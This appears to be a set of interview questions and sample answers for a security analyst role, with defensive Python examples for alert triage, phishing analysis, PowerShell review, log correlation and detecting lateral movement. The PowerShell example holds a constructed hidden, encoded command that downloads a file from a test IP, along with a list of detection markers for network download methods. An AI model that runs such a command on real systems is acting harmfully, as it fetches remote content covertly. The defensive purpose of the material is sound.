Question 1
Difficulty: medium
How do you prioritize alerts when multiple security events come in at the same time?
Sample answer
I start by separating noise from true risk. My first pass is to look at asset criticality, user context, source reputation, and whether the events are linked to a broader pattern. For example, a failed login on a low-value test account is not equal to a successful sign-in from an unusual location followed by privilege changes on a finance system. I also check whether the alert is time-sensitive, such as ransomware behavior, suspicious PowerShell activity, or outbound connections to known malicious infrastructure. When volume is high, I use a triage checklist so I stay consistent and avoid tunnel vision. If something looks credible, I escalate quickly with clear notes on what I observed, what I ruled out, and what I recommend next. That helps the team act faster and makes my analysis easier to validate later.
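One way to make the triage pass described in this answer repeatable is to score each alert on the same factors (asset criticality, user context, source reputation, time-sensitive category, and whether other alerts share the same user and host) and sort the batch. The block below is an added example, not part of the page; the asset list, privileged users, bad source address and weights are constructed for a hypothetical environment and would normally come from a CMDB, the identity directory and a threat intelligence feed.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Tuple

# Constructed context lookups for a hypothetical environment (assumed values).
ASSET_CRITICALITY = {"fin-app-01": 5, "hr-db-02": 4, "wks-1042": 2, "dev-test-07": 1}
PRIVILEGED_USERS = {"svc_finance", "domadmin1"}
KNOWN_BAD_SOURCES = {"198.51.100.23"}  # constructed, from the RFC 5737 test range
TIME_SENSITIVE = {"ransomware_behavior", "suspicious_powershell", "c2_beacon"}


@dataclass
class Alert:
    id: str
    category: str
    host: str
    user: str
    source_ip: str
    outcome: str  # "success" or "failure"


def score_alert(a: Alert, linked_count: int) -> int:
    """Higher score means triage sooner; the weights are illustrative."""
    score = ASSET_CRITICALITY.get(a.host, 3) * 2  # unknown asset: assume a middle value
    if a.user in PRIVILEGED_USERS:
        score += 4
    if a.source_ip in KNOWN_BAD_SOURCES:
        score += 5
    if a.category in TIME_SENSITIVE:
        score += 6
    if a.outcome == "success":
        score += 2  # a successful action matters more than a blocked attempt
    score += min(linked_count, 3) * 2  # part of a broader pattern on the same user/host
    return score


def prioritize(alerts: List[Alert]) -> List[Tuple[int, str]]:
    """Return (score, alert id) pairs, highest priority first."""
    per_entity = defaultdict(int)
    for a in alerts:
        per_entity[(a.user, a.host)] += 1
    ranked = [(score_alert(a, per_entity[(a.user, a.host)] - 1), a.id) for a in alerts]
    ranked.sort(key=lambda t: (-t[0], t[1]))
    return ranked


# Constructed alert batch mirroring the answer's example: a failed login on a
# test account next to an unusual sign-in plus privilege change on a finance system.
SAMPLE_ALERTS = [
    Alert("A1", "failed_login", "dev-test-07", "test_user", "203.0.113.5", "failure"),
    Alert("A2", "unusual_location_signin", "fin-app-01", "svc_finance", "198.51.100.23", "success"),
    Alert("A3", "privilege_change", "fin-app-01", "svc_finance", "198.51.100.23", "success"),
    Alert("A4", "suspicious_powershell", "wks-1042", "jdoe", "10.0.0.5", "success"),
]


def triage_order() -> List[Tuple[int, str]]:
    return prioritize(SAMPLE_ALERTS)


if __name__ == "__main__":
    for score, alert_id in triage_order():
        print(f"{score:>3}  {alert_id}")
```

The two finance-system alerts rank first because they reinforce each other on the same user and host; the test-account failure lands last even though it arrived in the same batch.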
Question 2
Difficulty: easy
Walk me through how you would investigate a suspected phishing email reported by an employee.
Sample answer
I would treat it as both a user report and a potential threat indicator. First I would collect the message headers, sender address, URLs, attachments, and any evidence of user interaction. Then I would check whether the sender domain is spoofed, newly registered, or related to known malicious activity. If there is a link, I would analyze it safely, confirm whether it redirects through suspicious infrastructure, and look for credential harvesting or malware delivery. I would also search the mail gateway and SIEM for similar messages sent to other users. If someone clicked the email, I would verify account activity, reset credentials if needed, and confirm whether the endpoint showed any unusual behavior. I think the key is to move fast, but not guess. A good investigation should answer three things: what the email is, who else saw it, and whether it created any real exposure.
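The header, sender, URL and attachment checks in this answer can be scripted so the first pass on a reported message is consistent. The following is an added example, not the page's own code: it parses one constructed message (all domains are reserved .example names) with Python's standard email module and reports Reply-To/From domain mismatch, SPF/DKIM/DMARC results, links whose visible text names a different host than their target, and executable attachments. Which results count as a finding is an assumption chosen for the example.

```python
import email
import re
from email import policy
from email.utils import parseaddr
from urllib.parse import urlparse

# Constructed example message (not a real phishing sample).
RAW_MESSAGE = """\
Return-Path: <bounce@mailer.example>
Authentication-Results: mx.corp.example; spf=fail smtp.mailfrom=mailer.example; dkim=none; dmarc=fail header.from=contoso-support.example
From: "IT Support" <helpdesk@contoso-support.example>
Reply-To: recovery@mailer.example
To: jane.doe@corp.example
Subject: Action required: password expires today
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/html; charset="utf-8"

<p>Your password expires today. Sign in at
<a href="http://login.portal-verify.example/reset">https://portal.corp.example</a>
to keep access.</p>
--b1
Content-Type: application/octet-stream; name="Invoice.pdf.exe"
Content-Disposition: attachment; filename="Invoice.pdf.exe"
Content-Transfer-Encoding: base64

aGVsbG8=
--b1--
"""

LINK_RE = re.compile(r'href="([^"]+)"[^>]*>([^<]+)</a>', re.I)
RISKY_EXTENSIONS = (".exe", ".js", ".vbs", ".scr", ".hta")


def domain_of(header_value: str) -> str:
    return parseaddr(header_value)[1].split("@")[-1].lower()


def analyze_message(raw: str) -> dict:
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []

    # Sender checks: a Reply-To on a different domain than From is a common sign of spoofing.
    from_domain = domain_of(str(msg["From"]))
    if msg["Reply-To"]:
        reply_domain = domain_of(str(msg["Reply-To"]))
        if reply_domain != from_domain:
            findings.append(f"reply-to domain {reply_domain} differs from From domain {from_domain}")

    # Authentication results recorded by the receiving gateway.
    auth = str(msg["Authentication-Results"] or "").lower()
    for mech in ("spf", "dkim", "dmarc"):
        m = re.search(rf"{mech}=(\w+)", auth)
        if m and m.group(1) in ("fail", "softfail", "none"):
            findings.append(f"{mech}={m.group(1)}")

    # Link checks: compare the host the user sees with the host the link resolves to.
    urls = []
    body = msg.get_body(preferencelist=("html", "plain"))
    html = body.get_content() if body else ""
    for href, text in LINK_RE.findall(html):
        urls.append(href)
        href_host = urlparse(href).hostname or ""
        text_host = urlparse(text.strip()).hostname or ""
        if text_host and text_host != href_host:
            findings.append(f"link text shows {text_host} but points to {href_host}")

    # Attachment checks: list names and flag executable types.
    attachments = [part.get_filename() for part in msg.iter_attachments()]
    for name in attachments:
        if name and name.lower().endswith(RISKY_EXTENSIONS):
            findings.append(f"executable attachment {name}")

    return {"from_domain": from_domain, "urls": urls,
            "attachments": attachments, "findings": findings}


if __name__ == "__main__":
    for finding in analyze_message(RAW_MESSAGE)["findings"]:
        print("-", finding)
```

The extracted URLs and attachment names feed the next steps in the answer: searching the gateway and SIEM for the same indicators across other mailboxes, and detonating the link or file in an isolated analysis environment rather than opening it.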
Question 3
Difficulty: hard
Describe how you would investigate a suspicious PowerShell process on a workstation.
Sample answer
I would start by validating the context of the process instead of assuming it is malicious. PowerShell is legitimate in many environments, so I would review the command line, parent process, execution time, user account, and whether the script was launched interactively or through automation. I would compare the behavior to baseline activity on that host and other endpoints. If I saw encoded commands, hidden windows, network calls, file drops, or unusual child processes, that would increase concern. Next I would check EDR telemetry, script block logging, and Windows event logs to understand what the command actually did. If it appears suspicious, I would isolate the machine if needed, preserve evidence, and look for lateral movement or credential access. I like to be systematic here, because the difference between admin activity and attack activity is often in the details around intent, frequency, and follow-on behavior.
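The checks this answer lists (command line, parent process, execution time, encoded commands, hidden windows, network calls and file drops) can be expressed as a small assessment over process-creation telemetry. The block below is an added example and not code from the page: it takes two constructed process events, decodes a -EncodedCommand argument the way a reviewer would when reading the command line, and returns the reasons that push an event toward escalation. The field names, the suspicious-parent list and the "three or more reasons" escalation rule are assumptions for the example.

```python
import base64
import re
from datetime import datetime

# Parents that rarely have a legitimate reason to spawn PowerShell (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "mshta.exe", "wscript.exe"}
NETWORK_MARKERS = ("invoke-webrequest", "invoke-restmethod", "net.webclient",
                   "downloadstring", "downloadfile")
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I)


def decode_encoded_command(cmdline: str):
    """PowerShell encodes -EncodedCommand as base64 of UTF-16LE text."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess_powershell_event(ev: dict) -> dict:
    reasons = []
    cmd = ev["command_line"]
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
    effective = (decoded or cmd).lower()  # inspect what actually ran, not the wrapper
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window")
    if BYPASS_RE.search(cmd):
        reasons.append("execution policy bypass")
    if ev["parent_image"].lower() in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {ev['parent_image']}")
    if any(marker in effective for marker in NETWORK_MARKERS):
        reasons.append("network download")
    if "-outfile" in effective or "set-content" in effective:
        reasons.append("writes file to disk")
    hour = datetime.fromisoformat(ev["time"]).hour
    if hour < 6 or hour >= 22:
        reasons.append("off-hours execution")
    return {"host": ev["host"], "user": ev["user"], "decoded": decoded,
            "reasons": reasons, "escalate": len(reasons) >= 3}


# Constructed telemetry. The encoded payload is built here so the decode is verifiable;
# the address is from the RFC 5737 test range.
ENCODED_PLAINTEXT = r"Invoke-WebRequest -Uri http://198.51.100.23/update.txt -OutFile $env:TEMP\u.txt"
ENCODED_B64 = base64.b64encode(ENCODED_PLAINTEXT.encode("utf-16le")).decode("ascii")

ADMIN_EVENT = {
    "host": "wks-0210", "user": "it.admin", "parent_image": "cmd.exe",
    "command_line": r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\patch-check.ps1",
    "time": "2024-03-12T10:15:00",
}
SUSPICIOUS_EVENT = {
    "host": "wks-1042", "user": "jdoe", "parent_image": "WINWORD.EXE",
    "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_B64}",
    "time": "2024-03-12T23:40:00",
}

if __name__ == "__main__":
    for ev in (ADMIN_EVENT, SUSPICIOUS_EVENT):
        result = assess_powershell_event(ev)
        print(ev["host"], "escalate" if result["escalate"] else "baseline", result["reasons"])
```

The admin event produces no reasons and stays in the baseline bucket; the second event accumulates six, and the decoded text tells the analyst exactly what to look for next in script block logging, proxy logs and the file system.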
Question 4
Difficulty: medium
Tell me about a time you had to respond to a security incident under pressure.
Sample answer
In a previous role, we received an alert that looked like possible account compromise on a privileged user. The timing was bad because it happened during a busy period, and several other tickets were already open. I immediately focused on the highest-risk actions: verifying the login source, checking for mailbox forwarding rules, reviewing recent privilege activity, and determining whether the account had touched sensitive systems. Once I confirmed the sign-in was coming from an unfamiliar location and there were additional suspicious actions, I escalated to containment and coordinated with the help desk to reset credentials. I also documented every step so the incident lead had a clean timeline. What I learned from that situation is that pressure can make people rush, but a calm, disciplined process is what prevents mistakes. The event was contained without evidence of broader spread, and the team later used my notes to improve the response playbook.
Question 5
Difficulty: medium
What logs and data sources do you rely on most when hunting for signs of compromise?
Sample answer
I like to combine endpoint, identity, network, and email data instead of leaning too heavily on one source. On the endpoint side, EDR telemetry, process execution logs, command-line arguments, file creation, and registry changes are especially useful. For identity activity, I pay close attention to authentication logs, MFA events, risky sign-ins, privilege changes, and impossible travel patterns. Network logs help me spot unusual outbound traffic, DNS anomalies, beaconing, and connections to rare destinations. I also value email gateway logs and proxy data because many incidents start with phishing or malicious links. The most useful hunts usually come from correlating multiple low-confidence signals into one stronger story. A single failed login may not mean much, but failed logins plus token abuse, mailbox rule creation, and unusual downloads can reveal a real compromise. Good analysis depends on being able to connect those dots quickly and accurately.
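The last part of this answer, turning several low-confidence signals from different sources into one stronger story, is the part most worth showing in code. The block below is an added example, not the page's own: it reads a few constructed log lines from identity, email, endpoint and network sources, groups them by user, and scores the best two-hour window of distinct signal types per user. The weights, the window and the threshold are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Each signal alone is low confidence; the weights are illustrative (assumed).
WEIGHTS = {
    "failed_login": 1, "risky_signin": 2, "token_replay": 3,
    "mailbox_rule_created": 3, "unusual_download": 2, "dns_rare_domain": 2,
}
THRESHOLD = 6
WINDOW = timedelta(hours=2)

# Constructed, normalized log lines: "timestamp | source | user | signal".
SAMPLE_LOG = """\
2024-03-12T08:05:00 | identity | jdoe | failed_login
2024-03-12T08:06:00 | identity | jdoe | failed_login
2024-03-12T08:20:00 | identity | jdoe | token_replay
2024-03-12T08:35:00 | email | jdoe | mailbox_rule_created
2024-03-12T09:10:00 | endpoint | jdoe | unusual_download
2024-03-12T09:00:00 | identity | bsmith | failed_login
2024-03-12T15:00:00 | identity | bsmith | failed_login
2024-03-12T16:30:00 | network | bsmith | dns_rare_domain
""".strip().splitlines()


def parse_events(lines):
    events = []
    for line in lines:
        ts, source, user, signal = [field.strip() for field in line.split("|")]
        events.append({"time": datetime.fromisoformat(ts), "source": source,
                       "user": user, "signal": signal})
    return events


def correlate(events, window=WINDOW):
    """For each user, find the window whose distinct signals score highest."""
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)
    stories = {}
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["time"])
        best_score, best_chain = 0, []
        for i, start in enumerate(evs):
            chain = [e for e in evs[i:] if e["time"] - start["time"] <= window]
            distinct = {e["signal"] for e in chain}
            score = sum(WEIGHTS.get(s, 1) for s in distinct)  # repeats do not add weight
            if score > best_score:
                best_score, best_chain = score, chain
        stories[user] = {
            "score": best_score,
            "signals": [e["signal"] for e in best_chain],
            "sources": sorted({e["source"] for e in best_chain}),
        }
    return stories


def hunt(lines):
    """Only users whose best window crosses the threshold become a hunt lead."""
    return {u: s for u, s in correlate(parse_events(lines)).items() if s["score"] >= THRESHOLD}


if __name__ == "__main__":
    for user, story in hunt(SAMPLE_LOG).items():
        print(user, story["score"], story["sources"], story["signals"])
```

Repeated failed logins for bsmith never cross the threshold on their own, while jdoe's failed logins followed by token abuse, a new mailbox rule and an unusual download line up within one window and surface as a single lead spanning three data sources.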
Question 6
Difficulty: easy
How do you distinguish between a false positive and a real threat in your day-to-day work?
Sample answer
I try to evaluate alerts against context, not just the rule name. A false positive usually falls apart when I check the asset, user, and behavior against known business activity. For example, if a detection flags an admin tool, I would verify whether the command was issued by an approved engineer, from a managed device, during normal working hours, and whether the result matched expected maintenance activity. A real threat often has indicators that do not fit the environment: unusual account use, repeated failed access, off-hours execution, rare parent-child process combinations, suspicious external destinations, or evidence of persistence. I also look at whether the event is isolated or part of a sequence. In my experience, a lot of false positives can be dismissed quickly, but I never rush to close an alert until I have enough evidence to explain why it is benign. That discipline reduces missed incidents.
Question 7
Difficulty: hard
If you noticed signs of possible lateral movement inside the network, what would you do first?
Sample answer
My first priority would be containment awareness and scope. I would confirm the indicator of lateral movement, such as remote service creation, unusual remote execution, abnormal admin shares, or repeated authentication attempts across hosts. Then I would identify the source system, the target systems, and whether privileged credentials may have been used. If the evidence suggests active spread, I would escalate quickly to isolate affected endpoints or accounts based on our response procedures. At the same time, I would search for related activity across logs to determine how far the movement has gone and whether sensitive systems are involved. I would also preserve relevant evidence before taking disruptive steps whenever possible. The key is not to assume it is contained just because one system looks suspicious. Lateral movement can look small at first and then become widespread very fast, so speed, coordination, and clean documentation matter a lot.
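Confirming the indicator and establishing scope, as this answer describes, usually starts with a fan-out query: one source host reaching an unusual number of other hosts over the network in a short window, with any remote service installs on those targets and the accounts involved pulled alongside. The block below is an added example, not the page's own code. It runs over constructed, simplified records in the shape of Windows logon (4624, LogonType 3) and service-install (7045) events; the field layout, threshold, window and privileged-account list are assumptions for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FANOUT_THRESHOLD = 3          # distinct targets from one source within the window (assumed)
WINDOW = timedelta(minutes=30)
PRIVILEGED = {"domadmin1", "svc_backup"}  # assumed privileged accounts

# Constructed records: "time,event_id,source_host,target_host,account,detail".
# 4624/LogonType=3 is a network logon on the target; 7045 is a service install.
SAMPLE_EVENTS = """\
2024-03-12T22:01:00,4624,wks-1042,fs-01,jdoe,LogonType=3
2024-03-12T22:03:00,4624,wks-1042,fs-02,jdoe,LogonType=3
2024-03-12T22:04:00,4624,wks-1042,db-01,domadmin1,LogonType=3
2024-03-12T22:05:00,7045,db-01,db-01,domadmin1,ServiceName=tmpsvc
2024-03-12T22:09:00,4624,wks-1042,fin-app-01,domadmin1,LogonType=3
2024-03-12T10:00:00,4624,mgmt-01,fs-01,svc_backup,LogonType=3
2024-03-12T10:01:00,4624,mgmt-01,fs-02,svc_backup,LogonType=3
""".strip().splitlines()


def parse_events(lines):
    events = []
    for line in lines:
        ts, eid, src, dst, account, detail = line.split(",")
        events.append({"time": datetime.fromisoformat(ts), "event_id": int(eid),
                       "src": src, "dst": dst, "account": account, "detail": detail})
    return events


def find_lateral_movement(events):
    """Return one finding per source host that fans out to many targets."""
    logons = sorted((e for e in events if e["event_id"] == 4624 and "LogonType=3" in e["detail"]),
                    key=lambda e: e["time"])
    services = [e for e in events if e["event_id"] == 7045]
    by_src = defaultdict(list)
    for e in logons:
        by_src[e["src"]].append(e)

    findings = []
    for src, evs in by_src.items():
        for i, start in enumerate(evs):
            end = start["time"] + WINDOW
            chain = [e for e in evs[i:] if e["time"] <= end]
            targets = sorted({e["dst"] for e in chain})
            if len(targets) < FANOUT_THRESHOLD:
                continue
            accounts = sorted({e["account"] for e in chain})
            # Service installs on the reached targets inside the same window suggest remote execution.
            installs = [(s["dst"], s["detail"]) for s in services
                        if s["dst"] in targets and start["time"] <= s["time"] <= end]
            findings.append({
                "source": src, "targets": targets, "accounts": accounts,
                "privileged": any(a in PRIVILEGED for a in accounts),
                "service_installs": installs,
                "window_start": start["time"].isoformat(),
            })
            break  # one finding per source host is enough to start scoping
    return findings


if __name__ == "__main__":
    for f in find_lateral_movement(parse_events(SAMPLE_EVENTS)):
        print(f["source"], "->", f["targets"], "accounts:", f["accounts"],
              "privileged:" , f["privileged"], "service installs:", f["service_installs"])
```

The backup host touching two file servers during the day stays below the threshold, while the workstation reaching four hosts in eight minutes, switching to a privileged account partway through and coinciding with a service install on the database server, comes back as one finding that already lists the source, the targets and the accounts the answer says to identify first.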
Question 8
Difficulty: medium
How do you stay current with evolving attacker techniques and apply that knowledge to your work?
Sample answer
I treat staying current as part of the job, not something I do only when I have extra time. I read incident reports, threat research, vendor writeups, and analyst blogs to understand how attackers are changing their tradecraft. I also pay attention to what I see internally, because real detections and near-misses often tell you more than any article can. When a new technique becomes relevant, I think about where it would show up in our environment and what logs would confirm it. For example, if I learn about a new living-off-the-land method, I will look at what process chains, command lines, and authentication patterns might expose it. I also like to share useful findings with the team so the knowledge becomes operational, not just personal. The goal is to convert threat intelligence into practical detection and faster analysis, not just to collect interesting information.
Question 9
Difficulty: medium
How would you handle a situation where a business unit pushes back on security containment because it affects operations?
Sample answer
I would explain the risk clearly and keep the conversation focused on facts. Business teams usually respond better when they understand the impact in operational terms, not just security language. If containment is necessary, I would describe what we know, what could happen if we delay, and what options exist to reduce disruption. For example, isolating one endpoint may be better than shutting down a broader segment, or temporarily disabling one account may stop an active attack while preserving most work. I also try to involve the right stakeholders early so the decision is not made in a vacuum. If there is room to validate a less disruptive option, I will test that carefully, but I will not let convenience override containment when the evidence shows real risk. My approach is to be firm on security requirements and respectful about business pressures, because long-term trust depends on both.
Question 10
Difficulty: easy
What does good incident documentation look like to you in a cyber defense role?
Sample answer
Good documentation is clear, chronological, and useful to someone who was not in the room when the incident started. I want it to answer what happened, when it happened, who was affected, what evidence supports the conclusion, what actions were taken, and what remains unresolved. I avoid vague language and make sure I include timestamps, log references, hostnames, usernames, hashes, IPs, and any containment steps. I also separate confirmed facts from assumptions so the response team knows what is solid and what still needs verification. Strong documentation should support both immediate response and later review, because the same notes may be used for remediation, reporting, or a lessons-learned session. In practice, I write as I work so I do not lose details under pressure. That habit makes handoffs smoother and reduces the risk of repeating work or missing important clues during a fast-moving incident.